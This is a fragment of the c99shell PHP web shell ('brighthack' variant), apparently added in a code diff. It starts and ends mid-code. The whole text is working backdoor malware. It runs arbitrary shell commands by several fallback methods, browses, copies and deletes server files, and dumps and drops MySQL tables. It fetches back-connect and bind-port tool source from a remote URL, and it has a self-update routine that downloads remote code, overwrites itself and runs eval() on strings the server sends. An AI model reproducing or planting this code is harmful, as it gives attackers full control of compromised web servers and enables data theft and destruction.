explode(", ",$disablefunc); + } + if (!function_exists("c99_buff_prepare")) + { + function c99_buff_prepare() + { + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} + } + } + c99_buff_prepare(); + if (!function_exists("c99_sess_put")) + { + function c99_sess_put($data) + { + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); + } + } + foreach (array("sort","sql_sort") as $v) + { + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} + } + if ($sort_save) + { + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} + } + if (!function_exists("str2mini")) + { + function str2mini($content,$len) + { + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} + } + } + if (!function_exists("view_size")) + { + function view_size($size) + { + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } + } + } + if (!function_exists("fs_copy_dir")) + { + function fs_copy_dir($d,$t) + { + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; + } + } + if (!function_exists("fs_copy_obj")) + { + function fs_copy_obj($d,$t) + { + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} + } + } + if (!function_exists("fs_move_dir")) + { + function fs_move_dir($d,$t) + { + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; + } + } + if (!function_exists("fs_move_obj")) + { + function fs_move_obj($d,$t) + { + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return FALSE;} + } + else {return FALSE;} + } + } + if (!function_exists("fs_rmdir")) + { + function fs_rmdir($d) + { + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); + } + } + if (!function_exists("fs_rmobj")) + { + function fs_rmobj($o) + { + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return FALSE;} + } + } + if (!function_exists("myshellexec")) + { + function myshellexec($cmd) + { + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) + { + exec($cmd,$result); $result = join("\n",$result); + } + elseif (($result = `$cmd`) !== FALSE) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) + { + $v = @ob_get_contents(); + @ob_clean(); system($cmd); + $result = @ob_get_contents(); + @ob_clean(); + echo $v; + } + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) + { + $v = @ob_get_contents(); + @ob_clean(); + passthru($cmd); + $result = @ob_get_contents(); + @ob_clean(); + echo $v; + } + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; + } + } + if (!function_exists("tabsort")) + { + function tabsort($a,$b) + { + global $v; return strnatcmp($a[$v], $b[$v]); + } + } + if (!function_exists("view_perms")) + { + function view_perms($mode) + { + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); + } + } + if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) + {function posix_getpwuid($uid) {return FALSE;}} + if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) + {function posix_getgrgid($gid) {return FALSE;}} + if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) + {function posix_kill($gid) {return FALSE;}} + if (!function_exists("parse_perms")) + { + function parse_perms($mode) + { + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); + } + } + if (!function_exists("parsesort")) + { + function parsesort($sort) + { + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); + } + } + if (!function_exists("view_perms_color")) + { + function view_perms_color($o) + { + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} + } + } + if (!function_exists("c99getsource")) + { + function c99getsource($fn) + { + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return FALSE;} + } + } + if (!function_exists("c99sh_getupdate")) + { + function c99sh_getupdate($update = TRUE) + { + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } + } + } + if (!function_exists("mysql_dump")) + { + function mysql_dump($set) + { + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = TRUE;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = TRUE;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." + # Home page: http://ccteam.ru + # + # Host settings: + # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." + # Date: ".date("d.m.Y H:i:s")." + # DB: \"".$db."\" + #--------------------------------------------------------- + "; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; + } + } + if (!function_exists("mysql_buildwhere")) + { + function mysql_buildwhere($array,$sep=" and",$functs=array()) + { + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; + } + } + if (!function_exists("mysql_fetch_all")) + { + function mysql_fetch_all($query,$sock) + { + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; + } + } + if (!function_exists("mysql_smarterror")) + { + function mysql_smarterror($type,$sock) + { + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; + } + } + if (!function_exists("mysql_query_form")) + { + function mysql_query_form() + { + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) + { + if (!$sql_query_error) {$sql_query_error = "Query was empty";} + echo "Error:
    ".$sql_query_error."
    "; + } + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; + if (($sql_query) and (!$submit)) {echo "Do you really want to";} + else {echo "SQL-Query";} + echo ":

    +

    + + + + +
    Fields:
    "; + foreach ($tbl_struct as $field) + { + $name = $field["Field"]; + echo "» ".$name."
    "; + } + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} + } + } + if (!function_exists("mysql_create_db")) + { + function mysql_create_db($db,$sock="") + { + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} + } + } + if (!function_exists("mysql_query_parse")) + { + function mysql_query_parse($query) + { + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return FALSE;} + } + } + if (!function_exists("c99fsearch")) + { + function c99fsearch($d) + { + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== FALSE) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); + } + } + if ($act == "gofile") + { + if (is_dir($f)) + { + $act = "ls"; $d = $f; + } + else {$act = "f"; $d = dirname($f); $f = basename($f);} + } + //Sending headers + @ob_start(); + @ob_implicit_flush(0); + function onphpshutdown() + { + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } + } + function c99shexit() + { + onphpshutdown(); + exit; + } + header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); + header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); + header("Cache-Control: no-store, no-cache, must-revalidate"); + header("Cache-Control: post-check=0, pre-check=0", FALSE); + header("Pragma: no-cache"); + if (empty($tmpdir)) + { + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} + } + $tmpdir = realpath($tmpdir); + $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); + if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} + if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} + else {$tmpdir_logs = realpath($tmpdir_logs);} + if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") + { + $safemode = TRUE; + $hsafemode = "ON (secure)"; + } + else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} + $v = @ini_get("open_basedir"); + if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} + else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} + $sort = htmlspecialchars($sort); + if (empty($sort)) {$sort = $sort_default;} + $sort[1] = strtolower($sort[1]); + $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); + if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} + $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); + @ini_set("highlight.bg",$highlight_bg); //FFFFFF + @ini_set("highlight.comment",$highlight_comment); //#FF8000 + @ini_set("highlight.default",$highlight_default); //#0000BB + @ini_set("highlight.html",$highlight_html); //#000000 + @ini_set("highlight.keyword",$highlight_keyword); //#007700 + @ini_set("highlight.string",$highlight_string); //#DD0000 + if (!is_array($actbox)) {$actbox = array();} + $dspact = $act = htmlspecialchars($act); + $disp_fullpath = $ls_arr = $notls = null; + $ud = urlencode($d); + ?> + + + + + <?php echo getenv("HTTP_HOST"); ?> - phpshell + + + +
    + + + + +
    + +
    +
    + brighthack +
    +
    + ON | "):("OFF | ")); + echo "MySQL : ".(($mysql_on)?("ON | "):("OFF | ")); + echo "MSSQL : ".(($mssql_on)?("ON | "):("OFF | ")); + echo "PostgreSQL : ".(($pg_on)?("ON | "):("OFF | ")); + echo "Oracle : ".(($ora_on)?("ON | "):("OFF
    ")); + + ?> +
    + + + +
    Disable functions : NONE";}else{echo "$df";} ?> +
    Software :
    Nama Sistem : ",1); ?>
    User : + ",1);} + else {echo get_current_user();} ?>
    Methode : + +

    + ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; + } + if (is_writable($d)) + { + $wd = TRUE; + $wdt = "[ ok ]"; + echo " ".view_perms(fileperms($d)).""; + } + else + { + $wd = FALSE; + $wdt = "[ Read-Only ]"; + echo " ".view_perms_color($d).""; + } + if (is_callable("disk_free_space")) + { + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%) "; + } + echo "
    "; + $letters = ""; + if ($win) + { + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } + } + if (!empty($letters)) {echo "Drive : ". $letters ."";} + } + if (count($quicklaunch) > 0) + { + echo "

    "; + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) + { + $a = explode(DIRECTORY_SEPARATOR,$d); + unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a); + } + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "[".$item[0]."] "; + } + } + echo "
    "; + echo "

    "; + if ((!empty($donated_html)) and (in_array($act,$donated_act))) + {echo " +
    ".$donated_html."

    ";} + echo " + "; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode(" ",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = " | Desc";} + else {$y = " | Asc";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; + if ($act == "") {$act = $dspact = "ls";} + + #################### SQL ####################### + + if ($act == "sql") + { + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?> + +

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    + + "; + if (!$sql_sock) + { + ?> + "; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
    +
  • If login is null, login is owner of process.
  • If host is null, host is localhost +
  • If port is null, port is 3306 (default)
  • + + +
    Please, fill the form: + + + + +
    UsernamePassword Database
    + + +
    HostPORT
    +
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "» ".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home
    +
    + + + + + +
    Please, select database
    "; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; + if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} + else { + foreach($boxrow as $v) + { + $sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n"; + } + $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as 